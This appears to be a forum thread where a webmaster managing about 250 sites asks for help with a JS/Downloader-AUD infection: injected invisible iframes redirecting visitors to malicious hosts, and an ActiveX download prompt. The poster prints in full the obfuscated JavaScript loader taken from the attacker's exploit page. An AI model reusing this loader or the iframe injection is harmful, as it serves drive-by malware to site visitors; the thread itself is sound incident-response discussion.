Webserver infection - JS/Downloader-AUD

Hi to the community, and sorry if this has been solved before, but 'anyway.
I manage a dedicated webserver with around 250 sites, and have had a second site now infected - I assume - with JS/Downloader-AUD. I assume this because I got reports of McAfee and Norton detecting the script in tempory internet files while browsing the site.
I have googled it a bit, but can't find anything really helpful, so I'm hoping some bright cookie out there knows what it's all about, because I've poured over the sites and can't find anything anywhere... except for a invisible 1x1 <iframe> on every index.*, default.* and login.* pointing, using that annoying &%45 encoding stuff to winhex.org, which in turn points towards http://agressor.info/exp/index.php in the same way. agressor has some ghastly script which I havn't worked out what it does. All it does for me is to output "Sorry! You IP is blocked.". Here it is for anyone who really, really wants to work it out (I've line breaked and tabbed it at semi colons and brackets and commented to make it a little clearer):

Code:

<script language=JavaScript>
function makemelaugh(x){
var l=x.length, b=1024, i, j, r, p=0, s=0, w=0, t=Array(63,6,8,26,37,47,48,41,58,50,0,0,0,0,0,0,25,56,11,23,33,10,9,49,52,39,38,46,20,59,14,28,21,57,36,19,18,53,32,16,60,3,4,0,0,0,0,43,0,62,13,35,7,24,17,12,5,2,0,61,1,42,29,15,22,34,54,31,44,45,51,55,30,40,27);  //the array is for a fromcharcode based on horrid maths - I think this is what it uses to make up the script, it has things like < ? / ; etc
for(j=Math.ceil(l/b);j>0;j--){
  r='';
  for(i=Math.min(l,b);i>0;i--,l--){
    w|=(t[x.charCodeAt(p++)-48])<<s;
    if(s){
      r+=String.fromCharCode(170^w&255);
      w>>=8;
      s-=2
    }else{
      s=6
    }
  }
document.write(r)
}
}
makemelaugh("E3@9oStwocb4QCgreokqENsGs_AA8_A6@_291CO9l0tvZ3@DF0gGx0grLi") //the string parses to makemelaugh is only important for it's length, which is 58
</script>

P.S. the translations on winhex, the top is "Glory to Russia" and the bottom is "Remember our past"

Also, whenever I navigate to winhex, or (sometimes) one of the pages on the affected sites, in IE, it wants to first download then run a activex script, from M$ corp (apparently) called 'Microsoft Data Access - Remote Data Services Dat...'

I've read somewhere that JS/Downloader-AUD can infect a site through code insertion using a "Contact Us" form or the like, but I can't see how that would put the iframes in. I'm at this point assuming it's a a bruteforce/dictionary ftp login hack, which then inserts the iframes in. Problem is I went and removed all the iframes and apparently people are still getting the warnings.

Anywho, thanks for reading this far, and I hope you can shed some light on this.

 

Thanks for the reply chaslang, but unfortunetly McAfee isn't much use, as it's a linux server that I'm trying to clean, not my own machine. I was hoping someone would know what the JS script looks like imbedded in the pages, or whether it is a mysql code insertion or the like.

Thanks for the M$ link, helps to narrow it down a bit.

P.S. for anyone out there, McAfee has this

I'm guessing that the JS below is the "encrypted" code.

 

Ah, hadn't realised that. Actually speaking, though, it's not the server itself per sae that is infected - it's the website itself. So not talking binary or OS files, just PHP/ASPX/HTML. Plus the actual script itself is javascript, so it's fairly OS independant. The end user computers being affected by script, or more specifically the viruses the script is fetching are win32, but the script itself never actually infects a computer as such, or at least not past getting into the Tempory Internet Files. The main danger from this script appears to be in the little activeX bar when browsing pages with the script, which, when run, in turns downloads the actual viruses which infect the computer.

 

The end-user PC's are not my concern or problem thank goodness. What I guess I'm trying to find out here is any information people have on the actual JS script itself, as it sits inside the infected webpages, so I can go through the actual website that has the script inside it, and clean it out.
The only reason I know the webpage was infected with the script (via I assume a FTP brutedorce or the like) is that some people browsing the site got anti virus on access alerts to it in the temporary internet files.